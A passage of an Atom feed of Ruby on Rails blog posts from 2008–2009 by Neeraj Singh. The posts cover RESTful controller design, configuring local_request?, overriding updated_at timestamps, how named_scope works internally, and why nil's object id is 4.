       <title><![CDATA[Restful architecture does not mean one to one mapping]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/restful-architecture-does-not-mean-one-to-one-mapping-with-model"/>
      <updated>2009-02-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/restful-architecture-does-not-mean-one-to-one-mapping-with-model</id>
      <content type="html"><![CDATA[<p>Rails makes it easy to adopt a Restful architecture. All you have to do is the following.</p><pre><code class="language-ruby">map.resources :pictures</code></pre><p>I started putting all picture-related activities in <code>pictures_controller.rb</code>. In the beginning it was simple.</p><p>Slowly the application evolved. It started handling two different types of pictures: pictures for events, and pictures of the users of the system.</p><p>One can add comments to event pictures, but one can't add comments to user pictures. Slowly the requirements for event pictures grew vastly different from those for user pictures.</p><p>Sounds familiar, right? Initially the controller takes on a few responsibilities, but slowly it takes on a lot more, and then the controller becomes huge.</p><p>The pictures controller was really huge, was fast becoming a mess, and writing tests especially was getting very difficult.</p><p>The time had come to create two different controllers: one for event pictures and one for user pictures.</p><p>But wait. Lots of people would say that if we want to be restful then there has to be a one-to-one mapping between the model and the controller. Not true.</p><h2>Model != resource</h2><p>Being restful does not mean that there has to be a one-to-one mapping between the model and the controller.</p><p>I am going to create a new controller called <code>user_pictures_controller.rb</code> which will take on all the functionality related to users dealing with pictures. And this is going to be restful.</p><pre><code class="language-ruby">map.resources :user_pictures</code></pre><p>Above I have defined a resource called <code>user_pictures</code>. 
To keep it simple, this controller will do only three things:</p><ul><li>display all the pictures of the user (index)</li><li>allow the user to upload pictures (create)</li><li>allow the user to delete a picture (destroy)</li></ul><p>That's the general idea. In my application I have only three actions.</p><p>However, in the interest of general discussion I am going to show all seven methods here. Also, for simplicity, create in this case means adding a record (I am not showing multipart upload).</p><h2>Controller</h2><p>Here is the code for the controller.</p><pre><code class="language-ruby"># user_pictures_controller.rb
class UserPicturesController &lt; ApplicationController
  def index
    @pictures = Picture.all
  end

  def new
    render
  end

  def create
    @picture = Picture.new(params[:picture])
    if @picture.save
      flash[:notice] = 'Picture was successfully created.'
      redirect_to user_picture_path(:id =&gt; @picture.id)
    else
      render :action =&gt; &quot;new&quot;
    end
  end

  def show
    @picture = Picture.find(params[:id])
  end

  def edit
    @picture = Picture.find(params[:id])
  end

  def update
    @picture = Picture.find(params[:id])
    if @picture.update_attributes(params[:picture])
      flash[:notice] = 'Picture was successfully updated.'
redirect_to user_picture_path(:id =&gt; @picture.id)    else      render :action =&gt; &quot;edit&quot;    end  end  def destroy    @picture = Picture.find(params[:id])    @picture.destroy    redirect_to user_pictures_path  endend</code></pre><h2>View</h2><pre><code class="language-ruby"># index.html.erb&lt;h1&gt;Listing pictures&lt;/h1&gt;&lt;table&gt;  &lt;tr&gt;    &lt;th&gt;Name&lt;/th&gt;    &lt;th&gt;Quality&lt;/th&gt;  &lt;/tr&gt;&lt;% for picture in @pictures %&gt;  &lt;tr&gt;    &lt;td&gt;&lt;%=h picture.name %&gt;&lt;/td&gt;    &lt;td&gt;&lt;%=h picture.quality %&gt;&lt;/td&gt;    &lt;td&gt;&lt;%= link_to 'Show', user_picture_path(picture) %&gt;&lt;/td&gt;    &lt;td&gt;&lt;%= link_to 'Edit', edit_user_picture_path(picture) %&gt;&lt;/td&gt;    &lt;td&gt;  &lt;%= link_to 'Destroy',  user_picture_path(picture),                                :confirm =&gt; 'Are you sure?',                                :method =&gt; :delete %&gt;    &lt;/td&gt;  &lt;/tr&gt;&lt;% end %&gt;&lt;/table&gt;&lt;%= link_to 'New picture', new_user_picture_path %&gt;</code></pre><pre><code class="language-ruby"># edit.html.erb&lt;h1&gt;Editing picture&lt;/h1&gt;&lt;% form_for(:picture,            :url =&gt; user_picture_path(@picture),            :html =&gt; {:method =&gt; :put}) do |f| %&gt;  &lt;%= f.error_messages %&gt;  &lt;p&gt;    &lt;%= f.label :name %&gt;&lt;br /&gt;    &lt;%= f.text_field :name %&gt;  &lt;/p&gt;  &lt;p&gt;    &lt;%= f.label :quality %&gt;&lt;br /&gt;    &lt;%= f.text_field :quality %&gt;  &lt;/p&gt;  &lt;p&gt;    &lt;%= f.submit &quot;Update&quot; %&gt;  &lt;/p&gt;&lt;% end %&gt;&lt;%= link_to 'Show', user_picture_path(@picture) %&gt; |&lt;%= link_to 'All', user_pictures_path %&gt;</code></pre><pre><code class="language-ruby"># new.html.erb&lt;h1&gt;New picture&lt;/h1&gt;&lt;% form_for(:picture, :url =&gt; user_pictures_path, :html =&gt; {:method =&gt; :post}) do |f| %&gt;  &lt;%= f.error_messages %&gt;  &lt;p&gt;    &lt;%= f.label :name %&gt;&lt;br /&gt;   
 &lt;%= f.text_field :name %&gt;  &lt;/p&gt;  &lt;p&gt;    &lt;%= f.label :quality %&gt;&lt;br /&gt;    &lt;%= f.text_field :quality %&gt;  &lt;/p&gt;  &lt;p&gt;    &lt;%= f.submit &quot;Create&quot; %&gt;  &lt;/p&gt;&lt;% end %&gt;&lt;%= link_to 'All', user_pictures_path %&gt;</code></pre><pre><code class="language-ruby"># show.html.erb&lt;p&gt;  &lt;b&gt;Name:&lt;/b&gt;  &lt;%=h @picture.name %&gt;&lt;/p&gt;&lt;p&gt;  &lt;b&gt;Quality:&lt;/b&gt;  &lt;%=h @picture.quality %&gt;&lt;/p&gt;&lt;%= link_to 'Edit', edit_user_picture_path(:id =&gt; @picture) %&gt; |&lt;%= link_to 'All', user_pictures_path %&gt;</code></pre><h2>Another use case</h2><p>Let's talk about another example. Let's say that we have a model called<code>Project</code> and besides the regular functionality of creating, deleting, updatingand listing projects, one needs two more actions called enable and disableproject.</p><p>Well the projects controller can easily handle two more actions called &quot;enable&quot;and &quot;disable&quot;. However it is a good idea to create another controller called<code>project_status_controller</code> . This controller should have only two actions -<code>create</code> and <code>destroy</code>. <code>destroy</code> in this case would mean disabling the projectand <code>create</code> would mean enabling the project.</p><p>I know it looks counter intuitive. Actions 'enable' and 'disable' seem simplerthan &quot;create&quot; and &quot;destroy&quot;. I agree in the beginning adding more actions topictures controller looks easy. However if we go down that path then it is aslippery slope and we do not know when to stop.</p><p>Compare that with the RESTful design of having only seven action : <code>index</code>,<code>show</code>, <code>new</code>, <code>edit</code>, <code>create</code>, <code>update</code>, <code>destroy</code>. This limits what acontroller can do and that's a good thing. 
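</p>
<p>To make the idea concrete, here is a rough sketch of what such a controller could look like. This is a hypothetical Rails 2-era sketch, not code from the original application: the singular resource route, the <code>project_id</code> parameter and the <code>status</code> column are all assumptions.</p>
<pre><code class="language-ruby"># config/routes.rb (assumed)
map.resource :project_status

# app/controllers/project_status_controller.rb
class ProjectStatusController &lt; ApplicationController
  # POST /project_status -- &quot;enabling&quot; a project is creating its status
  def create
    @project = Project.find(params[:project_id])
    @project.update_attribute(:status, 'active')
    redirect_to project_path(@project)
  end

  # DELETE /project_status -- &quot;disabling&quot; a project is destroying its status
  def destroy
    @project = Project.find(params[:project_id])
    @project.update_attribute(:status, 'inactive')
    redirect_to project_path(@project)
  end
end</code></pre>
<p>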
This ensures that a controller does not take up too many responsibilities.</p>
<p>Creating another controller allows all the business logic which is not related to one of those seven actions to live somewhere else.</p>
<h2>One last example</h2>
<p>Now that we have the ability to &quot;enable&quot; and &quot;disable&quot; pictures, how about showing &quot;only active&quot;, &quot;only inactive&quot; and &quot;all&quot; pictures?</p>
<p>In order to accomplish this, once again we can add more actions to the pictures controller.</p>
<p>However it is much better to have two new controllers.</p>
<pre><code class="language-ruby">class Pictures::ActiveController &lt; ApplicationController
end

class Pictures::InactiveController &lt; ApplicationController
end</code></pre>
<p>Some of you must be thinking: what's the point of having a controller for the sake of having only one action? Well, the point is having code that can be changed easily and with confidence.</p>
<h2>Conclusion</h2>
<p>In this blog I tried to show that it is not necessary to have a one-to-one mapping between models and controllers to be RESTful. It is always a good idea to create a separate controller when the existing controller is burdened with too much work.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Configure local_request]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/rescue_action_in_public-local_request-and-how-to-configure-local_request"/>
      <updated>2009-02-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rescue_action_in_public-local_request-and-how-to-configure-local_request</id>
      <content type="html"><![CDATA[<p>How does Rails handle exceptions?</p>
<p>Rails exception handling depends on two factors and we are going to discuss both of them here.</p>
<pre><code class="language-ruby"># ~/lib/action_controller/rescue.rb
if consider_all_requests_local || local_request?
  rescue_action_locally(exception)
else
  rescue_action_in_public(exception)
end</code></pre>
<p>When exceptions are handled by <code>rescue_action_locally</code> then we get to see the page with the stacktrace. When exceptions are handled by <code>rescue_action_in_public</code>, we get to see <code>public/500.html</code> or an error page matching the error code.</p>
<p>As you can see, Rails uses two different methods, <code>consider_all_requests_local</code> and <code>local_request?</code>, to decide how an exception should be handled.</p>
<h2>Method consider_all_requests_local</h2>
<p><code>consider_all_requests_local</code> is a class level variable for <code>ActionController::Base</code>. We hardly pay attention to it but it is configured through the files residing in <code>config/environments</code>.</p>
<pre><code class="language-ruby"># config/environments/development.rb
config.action_controller.consider_all_requests_local = true

# config/environments/production.rb
config.action_controller.consider_all_requests_local = false</code></pre>
<p>As you can see, in the development environment all the requests are considered local.</p>
<h2>I have overridden the method local_request? but I am still not able to see the public page when an exception is raised.</h2>
<p>That is a common question I see on the mailing list. As you can see, the condition that decides how to handle an exception is</p>
<pre><code class="language-ruby">if consider_all_requests_local || local_request?</code></pre>
<p>In the development environment <code>consider_all_requests_local</code> is always true, as I showed before. Since one of the conditions is true, Rails always handles the exception using <code>rescue_action_locally</code>.</p>
<h2>I am running in production mode but I am still not able to see the public/500.html page when I get an exception at http://localhost:3000.</h2>
<p>Same issue. In this case you are running in production mode so <code>consider_all_requests_local</code> is <code>false</code>, but <code>local_request?</code> is still true because of localhost.</p>
<h2>I want local_request? to be environment dependent</h2>
<p>Recently I started using Hoptoad and I needed to test how Hoptoad would handle exceptions in production mode. However, without any change, <code>local_request?</code> was always returning true for <code>http://localhost:3000</code>.</p>
<p>Then I stuck the following file under <code>config/initializers</code>.</p>
<pre><code class="language-ruby"># config/initializers/local_request_override.rb
module CustomRescue
  def local_request?
    return false if Rails.env.production? || Rails.env.staging?
    super
  end
end

ActionController::Base.class_eval do
  include CustomRescue
end</code></pre>
<p>Now all requests in production or staging mode are treated as NOT local.</p>
<p>Now in both <code>staging</code> and <code>production</code> mode I get to see the 500.html page even if I am accessing the application from <code>http://localhost:3000</code>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Override automatic updated_at in ActiveRecord/Rails]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/override-automatic-timestamp-in-activerecord-rails"/>
      <updated>2009-01-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/override-automatic-timestamp-in-activerecord-rails</id>
      <content type="html"><![CDATA[<p>Rails provides some good tools, like automatically updating the <code>created_at</code> and <code>updated_at</code> columns. Developers do not need to worry about these columns. Rails updates these columns automatically, which is great.</p>
<p>However I have a unique business need where I need to update a column but I do not want <code>updated_at</code> to be changed. Or we can see the problem this way: I want to change the <code>updated_at</code> to a particular value.</p>
<pre><code class="language-ruby">&gt;&gt; User.first.update_attributes(:updated_at =&gt; 100.years.ago)
UPDATE `users` SET `updated_at` = '2009-01-20 19:15:25' WHERE `id` = 2</code></pre>
<p>Look at the SQL that is generated. Rails discarded the <code>updated_at</code> value that I had supplied and replaced the value with the current time. Rails works fine if you supply a <code>created_at</code> value. It is the <code>updated_at</code> value that is discarded.</p>
<p>Rails provides a feature called <a href="http://api.rubyonrails.com/classes/ActiveRecord/Timestamp.html">ActiveRecord::Base.record_timestamps</a>. Using this feature I can tell Rails not to auto timestamp records.</p>
<p>Let's try that.</p>
<pre><code class="language-ruby">&gt;&gt; User.record_timestamps = false
=&gt; false
&gt;&gt; User.first.update_attributes(:updated_at =&gt; 100.years.ago)
UPDATE `users` SET `updated_at` = '1909-01-20 18:52:50' WHERE `id` = 2
&gt;&gt; User.record_timestamps = true
=&gt; true</code></pre>
<p>It worked. I have successfully set <code>updated_at</code> to the year 1909. However there is a problem.</p>
<p>For a brief duration <code>User.record_timestamps</code> was set to false. That is a class level variable. It means that for that brief duration, if any other User record is updated then that record will not have the correct <code>updated_at</code> value. That is not right. I want just one record (User.first) to not change <code>updated_at</code>, without changing the behavior for the whole application.</p>
<p>In order to isolate the behavior to only the record we are interested in, I can do this.</p>
<pre><code class="language-ruby">&gt;&gt; u = User.first
&gt;&gt; class &lt;&lt; u
&gt;&gt;   def record_timestamps
&gt;&gt;     false
&gt;&gt;   end
&gt;&gt; end
&gt;&gt; u.update_attributes(:updated_at =&gt; 100.years.ago)
UPDATE `users` SET `updated_at` = '1909-01-20 18:58:10' WHERE `id` = 2
&gt;&gt; class &lt;&lt; u
&gt;&gt;   def record_timestamps
&gt;&gt;     super
&gt;&gt;   end
&gt;&gt; end
&gt;&gt; u.update_attributes(:updated_at =&gt; 200.years.ago)
UPDATE `users` SET `updated_at` = '2009-01-20 19:22:11' WHERE `id` = 2</code></pre>
<p>In order to restrict the changes to a single object, I am opening up the metaclass of u (the user object) and in that object I am adding a method called <code>record_timestamps</code>. The idea is to insert a method called <code>record_timestamps</code> in the metaclass which will return false, and in this way the changes are restricted to a single object rather than making the change at the class level.</p>
<p>At this point the metaclass of the user object has the method <code>record_timestamps</code> and this returns false. Now I update the record with <code>updated_at</code> set to 100 years ago. And I succeed.</p>
<p>Now I need to put the object's behavior back to normal. I open up the metaclass and call super in the method so that the method call will go up the chain. And that's what happens when I try to test <code>updated_at</code> again. This time the <code>updated_at</code> value that I set is ignored and Rails changes the <code>updated_at</code> value.</p>
<h2><code>update_record_without_timestamping</code> method</h2>
<p>This strategy of opening up an instance object works but it is messy. I would like to have a method that is much easier to use, and this is what I came up with. Stick this piece of code in an initializer.</p>
<pre><code class="language-ruby">module ActiveRecord
  class Base
    def update_record_without_timestamping
      class &lt;&lt; self
        def record_timestamps; false; end
      end
      save!
      class &lt;&lt; self
        def record_timestamps; super; end
      end
    end
  end
end</code></pre>
<p>This is how you can use it.</p>
<pre><code class="language-ruby">&gt;&gt; u = User.first
&gt;&gt; u.updated_at = 100.years.ago
&gt;&gt; u.created_at = 200.years.ago
&gt;&gt; u.update_record_without_timestamping
UPDATE `users` SET `created_at` = '1809-01-20 19:08:21',
`updated_at` = '1909-01-20 19:08:22' WHERE `id` = 2</code></pre>
<h2>Good usage of remove_method</h2>
<p>In the above solution I used super when I wanted to bring back the default auto timestamping behavior. Instead of super I can also use remove_method. More about what remove_method does is <a href="https://apidock.com/ruby/Module/remove_method">here</a>.</p>
<pre><code class="language-ruby">module ActiveRecord
  class Base
    def update_record_without_timestamping
      class &lt;&lt; self
        def record_timestamps; false; end
      end
      save!
      class &lt;&lt; self
        remove_method :record_timestamps
      end
    end
  end
end</code></pre>
<p>Using the above technique, I can fully control <code>updated_at</code> values without Rails messing up anything.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Under the hood: how named_scope works]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/under-the-hood-how-named-scope-works"/>
      <updated>2008-10-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/under-the-hood-how-named-scope-works</id>
      <content type="html"><![CDATA[<p><em>The following code was tested with ruby 1.8.7 and Rails 2.x.</em></p>
<p>Rails recently added the named_scope feature and it is a wonderful thing. If you don't know what <code>named_scope</code> is then you can find out more about it <a href="http://railscasts.com/episodes/108">here</a>.</p>
<p>This article is not about how to use <code>named_scope</code>. This article is about how <code>named_scope</code> does what it does so well.</p>
<h2>Understanding with_scope</h2>
<p>ActiveRecord has something called <code>with_scope</code> which is not associated with <code>named_scope</code>. The two are entirely separate things. However <code>named_scope</code> relies on the workings of <code>with_scope</code> to do its magic. So in order to understand how <code>named_scope</code> works, first let's try to understand what <code>with_scope</code> is.</p>
<p><code>with_scope</code> lets you add scope to a model in a very extensible manner.</p>
<pre><code class="language-ruby">def self.all_male
  with_scope(:find =&gt; {:conditions =&gt; &quot;gender = 'm'&quot;}) do
    all_active
  end
end

def self.all_active
  with_scope(:find =&gt; {:conditions =&gt; &quot;status = 'active'&quot;}) do
    find(:first)
  end
end

# User.all_active
# SELECT * FROM &quot;users&quot; WHERE (status = 'active') LIMIT 1

# User.all_male
# SELECT * FROM &quot;users&quot; WHERE ((gender = 'm') AND (status = 'active')) LIMIT 1</code></pre>
<p>We can see that when <code>User.all_male</code> is called, it internally calls the <code>all_active</code> method and the final SQL has both the conditions.</p>
<p><code>with_scope</code> allows nesting, and all the conditions nested together are used to form one single query. And <code>named_scope</code> uses this feature of <code>with_scope</code> to form one single query from a lot of named scopes.</p>
<h2>Writing our own <code>named_scope</code> called <code>mynamed_scope</code></h2>
<p>The best way to learn <code>named_scope</code> is by implementing the functionality of <code>named_scope</code> ourselves. We will build this functionality incrementally. To avoid any confusion we will call our implementation <code>mynamed_scope</code>.</p>
<p>To keep it simple, in the first iteration we will not support any lambda operation. We will support the simple conditions feature. Here is a usage of <code>mynamed_scope</code>.</p>
<pre><code class="language-ruby">class User &lt; ActiveRecord::Base
  mynamed_scope :active, :conditions =&gt; {:status =&gt; 'active'}
  mynamed_scope :male, :conditions =&gt; {:gender =&gt; 'm'}
end</code></pre>
<p>We expect the following queries to provide the right result.</p>
<pre><code class="language-ruby">User.active
User.male
User.active.male
User.male.active</code></pre>
<h2>Let's implement <code>mynamed_scope</code></h2>
<p>At the top of user.rb add the following lines of code.</p>
<pre><code class="language-ruby">module ActiveRecord
  module MynamedScope
    def self.included(base)
      base.extend ClassMethods
    end

    module ClassMethods
      def mynamed_scope(name, options = {})
        puts &quot;name is #{name}&quot;
      end
    end
  end
end

ActiveRecord::Base.send(:include, ActiveRecord::MynamedScope)</code></pre>
<p>Now in script/console if we do User then the code will not blow up.</p>
<p>Next we need to implement functionality so that <code>mynamed_scope</code> creates class methods like active and male.</p>
<p>What we need is a place where each <code>mynamed_scope</code> can be stored. If 7 <code>mynamed_scopes</code> are defined on User then we should have a way to get a reference to all those <code>mynamed_scopes</code>. We are going to add a class level attribute myscopes which will store all the <code>mynamed_scopes</code> defined for that class.</p>
<pre><code class="language-ruby">def myscopes
  read_inheritable_attribute(:myscopes) || write_inheritable_attribute(:myscopes, {})
end</code></pre>
<p>This discussion is going to be tricky.</p>
<p>We are storing all <code>mynamed_scope</code> information in a variable called myscopes. This will contain all the <code>mynamed_scopes</code> defined on User.</p>
<p>However we need one more way to track the scoping. When we are executing <code>User.active</code> then the active <code>mynamed_scope</code> should be invoked on User. However when we perform <code>User.male.active</code> then the <code>mynamed_scope</code> active should be performed in the scope of <code>User.male</code> and not directly on User.</p>
<p>This is really crucial. Let's try one more time. In the case of <code>User.active</code> the condition that was supplied while defining the <code>mynamed_scope</code> <code>active</code> should act on User directly. However in the case of <code>User.male.active</code> the condition that was supplied while defining the <code>mynamed_scope</code> <code>active</code> should be applied on the scope that was returned by <code>User.male</code>.</p>
<p>So we need a class which will store <code>proxy_scope</code> and <code>proxy_options</code>.</p>
<pre><code class="language-ruby">class Scope
  attr_reader :proxy_scope, :proxy_options

  def initialize(proxy_scope, options)
    @proxy_scope, @proxy_options = proxy_scope, options
  end
end # end of class Scope</code></pre>
<p>Now the question is when do we create an instance of the Scope class. The instance must be created at run time. When we execute <code>User.male.active</code>, until run time we don't know the scope that active has to work upon. It means that <code>User.male</code> should return a scope, and active will work upon that scope.</p>
<p>So for <code>User.male</code> the <code>proxy_scope</code> is the User class. But for <code>User.male.active</code>, the <code>mynamed_scope</code> 'active' gets (User.male) as the <code>proxy_scope</code>.</p>
<p>Also notice that <code>proxy_scope</code> happens to be the value of self.</p>
<p>Based on all that information we can now write the implementation of <code>mynamed_scope</code> like this.</p>
<pre><code class="language-ruby">def mynamed_scope(name, options = {})
  name = name.to_sym
  myscopes[name] = lambda { |proxy_scope| Scope.new(proxy_scope, options) }
  (class &lt;&lt; self; self end).instance_eval do
    define_method name do
      myscopes[name].call(self)
    end
  end
end</code></pre>
<p>At this point the overall code looks like this.</p>
<pre><code class="language-ruby">module ActiveRecord
  module MynamedScope
    def self.included(base)
      base.extend ClassMethods
    end

    module ClassMethods
      def myscopes
        read_inheritable_attribute(:myscopes) || write_inheritable_attribute(:myscopes, {})
      end

      def mynamed_scope(name, options = {})
        name = name.to_sym
        myscopes[name] = lambda { |proxy_scope| Scope.new(proxy_scope, options) }
        (class &lt;&lt; self; self end).instance_eval do
          define_method name do
            myscopes[name].call(self)
          end
        end
      end

      class Scope
        attr_reader :proxy_scope, :proxy_options

        def initialize(proxy_scope, options)
          @proxy_scope, @proxy_options = proxy_scope, options
        end
      end # end of class Scope
    end # end of module ClassMethods
  end # end of module MynamedScope
end

ActiveRecord::Base.send(:include, ActiveRecord::MynamedScope)

class User &lt; ActiveRecord::Base
  mynamed_scope :active, :conditions =&gt; {:status =&gt; 'active'}
  mynamed_scope :male, :conditions =&gt; {:gender =&gt; 'm'}
end</code></pre>
<p>On script/console</p>
<pre><code 
class="language-ruby">&gt;&gt; User.active.inspect  SQL (0.000549)    SELECT name FROM sqlite_master WHERE type = 'table' AND NOT name = 'sqlite_sequence'=&gt; &quot;#&lt;ActiveRecord::MynamedScope::ClassMethods::Scope:0x203201c @proxy_scope=User(id: integer, gender: string, status: string, created_at: datetime, updated_at: datetime), @proxy_options={:conditions=&gt;{:status=&gt;&quot;active&quot;}}&gt;&quot;&gt;&gt;</code></pre><p>What we get is an instance of Scope. What we need is a way to call sql statementat this point of time.</p><p>But calling sql can be tricky. Remember each scope has a reference to the<code>proxy_scope</code> before it. This is the way all the scopes are chained together.</p><p>What we need to do is to start walking through the scope graph and if theprevious <code>proxy_scope</code> is an instance of scope then add the condition from thescope to with_scope and then go to the previous <code>proxy_scope</code>. Keep walking andkeep nesting the with_scope condition until we find the end of chain whenproxy_scope will NOT be an instance of Scope but it will be a sub class ofActiveRecord::Base.</p><p>One way of finding if it is an scope or not is to see if it responds tofind(:all). If the <code>proxy_scope</code> does not respond to find(:all) then keep goingback because in the end User will be able to respond to find(:all) method.</p><pre><code class="language-ruby"># all these two methods to Scope classdef inspect  load_foundenddef load_found  find(:all)end</code></pre><p>Now in script/console you will get undefined method find. 
That is because findis not implemented by Scope.</p><p>Let's implement method_missing.</p><pre><code class="language-ruby">def method_missing(method, *args, &amp;block)  if proxy_scope.myscopes.include?(method)    proxy_scope.myscopes[method].call(self)  else    with_scope :find =&gt; proxy_options do      proxy_scope.send(method,*args)    end  endend</code></pre><p>Statement User.active.male invokes method 'male' and since method 'male' is notimplemented by Scope, we don't want to call <code>proxy_scope</code> yet since this method'male' might be a <code>mynamed_scope</code>. Hence in the above code a check is done tosee if the method that is missing is a declared <code>mynamed_scope</code> or not. If it isnot a <code>mynamed_scope</code> then the call is sent to <code>proxy_scope</code> for execution. Payattention to with_scope. Because of this with_scope all calls to <code>proxy_scope</code>are nested.</p><p>However Scope class doesn't implement with_scope method. However the first<code>proxy_scope</code> ,which will be User in our case, implements with_scope method. 
Sowe can delegate with_scope method to <code>proxy_scope</code> like this.</p><pre><code class="language-ruby">delegate :with_scope,  :to =&gt; :proxy_scope</code></pre><p>At this point of time the code looks like this</p><pre><code class="language-ruby">module ActiveRecord  module MynamedScope    def self.included(base)      base.extend ClassMethods    end    module ClassMethods      def myscopes        read_inheritable_attribute(:myscopes) || write_inheritable_attribute(:myscopes, {})      end      def mynamed_scope(name,options = {})        name = name.to_sym        myscopes[name] = lambda { |proxy_scope| Scope.new(proxy_scope,options) }        (class &lt;&lt; self; self end).instance_eval do          define_method name do            myscopes[name].call(self)          end        end      end      class Scope        attr_reader :proxy_scope, :proxy_options        delegate :with_scope,  :to =&gt; :proxy_scope        def initialize(proxy_scope, options)          @proxy_scope, @proxy_options = proxy_scope, options        end        def inspect          load_found        end        def load_found          find(:all)        end        def method_missing(method, *args, &amp;block)          if proxy_scope.myscopes.include?(method)            proxy_scope.myscopes[method].call(self)          else            with_scope :find =&gt; proxy_options do              proxy_scope.send(method,*args)            end          end        end      end # end of class Scope    end # end of module ClassMethods  end # endof module MynamedScopeendActiveRecord::Base.send(:include, ActiveRecord::MynamedScope)class User &lt; ActiveRecord::Base  mynamed_scope :active, :conditions =&gt; {:status =&gt;  'active'}  mynamed_scope :male, :conditions =&gt; {:gender =&gt; 'm'}end</code></pre><p>Let's checkout the result in script/console</p><pre><code class="language-ruby">&gt;&gt; User.activeSELECT * FROM &quot;users&quot; WHERE (&quot;users&quot;.&quot;status&quot; = 'active')&gt;&gt; User.maleSELECT 
* FROM &quot;users&quot; WHERE (&quot;users&quot;.&quot;gender&quot; = 'm')&gt;&gt; User.active.maleSELECT * FROM &quot;users&quot; WHERE ((&quot;users&quot;.&quot;gender&quot; = 'm') AND (&quot;users&quot;.&quot;status&quot; = 'active'))&gt;&gt; User.male.activeSELECT * FROM &quot;users&quot; WHERE ((&quot;users&quot;.&quot;status&quot; = 'active') AND (&quot;users&quot;.&quot;gender&quot; = 'm'))# you can also see count&gt;&gt; User.active.countSELECT count(*) AS count_all FROM &quot;users&quot; WHERE (&quot;users&quot;.&quot;status&quot; = 'active')=&gt; 2</code></pre><p><code>named_scope</code> supports a lot more things than what we have shown. <code>named_scope</code>supports passing lambda instead of conditions and it also supports joins andextensions.</p><p>However in the process of building <code>mynamed_scope</code> we got to see the workings ofthe <code>named_scope</code> implementation.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Why the id of nil is 4 in Ruby]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/why-the-id-of-nil-is-4-in-ruby"/>
      <updated>2008-06-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/why-the-id-of-nil-is-4-in-ruby</id>
      <content type="html"><![CDATA[<p><em>The following code was tested with ruby 1.8.7 and Rails 2.3.</em></p>
<p>While developing a Rails application you must have seen this:</p>
<pre><code class="language-plaintext">Called id for nil, which would mistakenly be 4 -- if you really
wanted the id of nil, use object_id</code></pre>
<p>We all know that this message is added by Rails, and it is called <code>whiny nil</code>. If you open your <code>config/environments/development.rb</code> file you will see</p>
<pre><code class="language-ruby"># Log error messages when you accidentally call methods on nil.
config.whiny_nils = true</code></pre>
<p>Simply stated, it means that if the application happens to invoke id on a nil object then throw an error. Rails assumes that under no circumstance does a developer want to find the id of a nil object. So this must be an error case, and Rails throws an exception.</p>
<p>The question I have is why 4. Why did Matz choose the id of nil to be 4? <a href="http://confreaks.tv/videos/mwrc2008-ruby-internals">This awesome presentation</a> on 'Ruby Internals' has the answer.</p>
<p>In short, Matz decided to have all the odd numbers reserved for numerical values. Check this out.</p>
<pre><code class="language-ruby">&gt; irb
&gt;&gt; 0.id
(irb):1: warning: Object#id will be deprecated; use Object#object_id
=&gt; 1
&gt;&gt; 1.id
(irb):2: warning: Object#id will be deprecated; use Object#object_id
=&gt; 3
&gt;&gt; 2.id
(irb):3: warning: Object#id will be deprecated; use Object#object_id
=&gt; 5
&gt;&gt; 3.id
(irb):4: warning: Object#id will be deprecated; use Object#object_id
=&gt; 7</code></pre>
<p>The ids 1, 3, 5 and 7 are taken by 0, 1, 2 and 3.</p>
<p>Now we are left with the ids 0, 2, 4 and higher values.</p>
<pre><code class="language-ruby">&gt; irb
&gt;&gt; FALSE.id
(irb):5: warning: Object#id will be deprecated; use Object#object_id
=&gt; 0
&gt;&gt; TRUE.id
(irb):6: warning: Object#id will be deprecated; use Object#object_id
=&gt; 2</code></pre>
<p>FALSE has the id 0 and TRUE has the id 2.</p>
<p>Now the next available id left is 4, and that is taken by NIL.</p>
<pre><code class="language-ruby">&gt; irb
&gt;&gt; NIL.id
(irb):7: warning: Object#id will be deprecated; use Object#object_id
=&gt; 4</code></pre>
<p>We won't even be discussing this issue once 1.9 comes out, where we will have to use <code>object_id</code> and then this won't be an issue.</p>
<p>You can follow more discussion about this article at <a href="https://news.ycombinator.com/item?id=3543695">Hacker news</a>.</p>]]></content>
    </entry>
     </feed>